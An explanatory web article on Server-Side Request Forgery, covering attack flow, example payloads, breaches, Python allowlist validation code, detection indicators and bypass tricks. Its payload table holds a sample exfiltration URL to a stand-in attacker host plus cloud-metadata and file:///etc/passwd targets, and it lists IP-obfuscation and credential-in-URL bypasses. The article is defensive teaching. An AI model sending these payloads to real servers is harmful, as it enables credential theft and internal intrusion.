Understanding SSRF
Server-Side Request Forgery (SSRF) is a critical web security vulnerability where attackers manipulate a server into making unauthorized requests to internal or external systems. This exploit can lead to data breaches, internal network reconnaissance, or even full system compromise. SSRF vulnerabilities often arise when applications process user-supplied URLs or input without proper validation.
Key Points
- Attack Vector: Exploits server-side functionality that makes HTTP requests based on user input
- Impact: Enables access to internal services, cloud metadata APIs, or external systems
- Prevalence: Common in applications with file upload/download, webhooks, or API proxy features
- OWASP Ranking: Listed as #10 in the OWASP Top 10 (2021) under "Server-Side Request Forgery"
How SSRF Attacks Work
Attack Flow
- Identify Vulnerable Input: Locate parameters that accept URLs or IP addresses (e.g., `?url=`, `?file=`, `?endpoint=`)
- Craft Malicious Payload: Inject a target URL (internal or external) into the vulnerable parameter
- Server Execution: The server makes the request on behalf of the attacker
- Data Exfiltration: Attacker receives responses containing sensitive information
Common Attack Scenarios
| Scenario | Example Payload | Potential Impact |
|---|---|---|
| Internal Network Scan | http://localhost:22 | Discover open ports/services |
| Cloud Metadata Access | http://169.254.169.254/latest/meta-data/ | Retrieve cloud credentials |
| File Access | file:///etc/passwd | Read sensitive files |
| External Service Abuse | https://attacker.com/exfil?data=secret | Data exfiltration |
Critical Note: Modern cloud environments (AWS, GCP, Azure) are particularly vulnerable to SSRF due to their metadata service endpoints.
Risks and Impact
Primary Security Risks
- Data Exposure: Access to internal databases, configuration files, or cloud credentials
- Network Reconnaissance: Mapping internal network topology and services
- Service Abuse: Using the server as a proxy for attacks on other systems
- Denial of Service: Overloading internal services with crafted requests
Real-World Examples
- Capital One Breach (2019): Attackers exploited SSRF to access AWS metadata and steal 100+ million customer records
- Shopify Bug Bounty: Researchers demonstrated SSRF to access internal Redis instances
- GitHub Actions Exploit: SSRF used to access internal GitHub services during CI/CD pipelines
Prevention and Mitigation
Technical Controls
| Control | Implementation | Effectiveness |
|---|---|---|
| Input Validation | Reject non-HTTP(S) schemes, validate URL structure | High |
| Allowlisting | Only permit requests to pre-approved domains/IPs | Very High |
| Network Segmentation | Isolate sensitive services from web servers | High |
| DNS Resolution | Disable DNS resolution for user-supplied hosts | Medium |
| Request Timeouts | Implement strict timeouts for outbound requests | Medium |
Implementation Checklist
- Disable unused URL schemes (`file://`, `gopher://`, `dict://`)
- Implement strict allowlists for internal and external destinations
- Use network policies to restrict outbound connections
- Disable HTTP redirects for user-controlled requests
- Log and monitor all outbound requests from application servers
Code-Level Protections
```python
# Example: Secure URL validation in Python
from urllib.parse import urlparse

# Only these hostnames may be fetched on behalf of a user.
ALLOWED_DOMAINS = ['api.trusted.com', 'cdn.ourdomain.com']

def is_safe_url(url):
    parsed = urlparse(url)
    # Reject file://, gopher://, dict:// and any other non-web scheme.
    if parsed.scheme not in ('http', 'https'):
        return False
    # hostname is None for malformed URLs, which also fails the allowlist.
    if parsed.hostname not in ALLOWED_DOMAINS:
        return False
    return True
```
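A stronger version of the same check, added here as an example rather than taken from the original page. It extends the hostname allowlist above with the bypass points listed under Bypassing Common Protections (credentials-in-URL syntax, obfuscated or internal addresses, a name that resolves to an internal address as in DNS rebinding) and refuses the non-standard ports flagged under Detection and Monitoring. The allowlist, the port set and the `FAKE_DNS` table are assumptions; `resolve_fake` is a constructed stand-in for the system resolver so the code runs offline.

```python
import ipaddress
import socket
from urllib.parse import urlparse

# Assumed allowlist. hooks.ourdomain.com is included only to show what happens when an
# allowlisted name resolves to an internal address (stale record or DNS rebinding).
ALLOWED_HOSTS = {"api.trusted.com", "cdn.ourdomain.com", "hooks.ourdomain.com"}
ALLOWED_PORTS = {80, 443}          # non-standard ports are an SSRF indicator, so refuse them

def resolve_dns(host):
    """Real resolver: every address the HTTP client could actually connect to."""
    return {info[4][0] for info in socket.getaddrinfo(host, None)}

# Constructed answers so the example runs offline; the public ones are arbitrary.
FAKE_DNS = {
    "api.trusted.com": {"8.8.8.8"},
    "cdn.ourdomain.com": {"1.1.1.1"},
    "hooks.ourdomain.com": {"8.8.8.8", "::ffff:10.0.0.5"},   # second answer is internal
}

def resolve_fake(host):
    return FAKE_DNS[host]          # KeyError stands in for a failed lookup

def is_internal(ip_text):
    """True for any address the app server must never be steered towards."""
    addr = ipaddress.ip_address(ip_text)
    addr = getattr(addr, "ipv4_mapped", None) or addr   # ::ffff:10.0.0.5 -> 10.0.0.5
    # not is_global covers RFC1918, loopback, link-local (169.254.169.254), reserved and
    # unspecified space; multicast is excluded separately for older Python versions.
    return addr.is_multicast or not addr.is_global

def is_safe_url(url, resolve=resolve_dns):
    parsed = urlparse(url)
    if parsed.scheme not in ("http", "https"):
        return False               # file://, gopher://, dict:// and friends
    if parsed.username is not None or parsed.password is not None:
        return False               # http://allowed-host@internal-ip/ syntax
    host = parsed.hostname         # already lower-cased by urlparse
    if host is None or host not in ALLOWED_HOSTS:
        return False               # also rejects bare IP literals, obfuscated or not
    try:
        port = parsed.port or (443 if parsed.scheme == "https" else 80)
        addrs = resolve(host)
    except (ValueError, KeyError, socket.gaierror):
        return False               # malformed port or unresolvable name
    if port not in ALLOWED_PORTS:
        return False
    # Judge every resolved answer: one internal address among several is enough to refuse.
    return not any(is_internal(a) for a in addrs)
```

The name is still resolved once here and again when the HTTP client connects, so a rebinding attacker can win that race; to close it, connect to the address that was validated or apply `is_internal` inside the client's connection hook.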
Detection and Monitoring
Indicators of Compromise
- Unusual outbound requests to:
  - Cloud metadata services (`169.254.169.254`)
  - Internal IP ranges (`10.0.0.0/8`, `172.16.0.0/12`, `192.168.0.0/16`)
  - Non-standard ports (e.g., `8080`, `22`, `3306`)
- Requests containing sensitive keywords (`/etc/passwd`, `aws_secret_key`)
Monitoring Strategies
- Outbound Request Logging: Capture all server-initiated HTTP requests
- Anomaly Detection: Alert on unusual destination patterns
- Rate Limiting: Throttle outbound requests from application servers
- SIEM Integration: Correlate SSRF attempts with other suspicious activities
Advanced Considerations
SSRF in Modern Architectures
- Microservices: Increased attack surface due to service-to-service communication
- Serverless: SSRF risks in cloud functions (Lambda, Cloud Functions)
- Kubernetes: Potential to access cluster-internal services
Bypassing Common Protections
Attackers may use:
- DNS Rebinding: Changing DNS responses during attack
- Alternative Encodings: IP address obfuscation (`0x7f.0.0.1`, `2130706433`)
- Protocol Smuggling: Using `http://example.com@internal-ip` syntax
- SSRF via File Uploads: Uploading malicious files that trigger SSRF when processed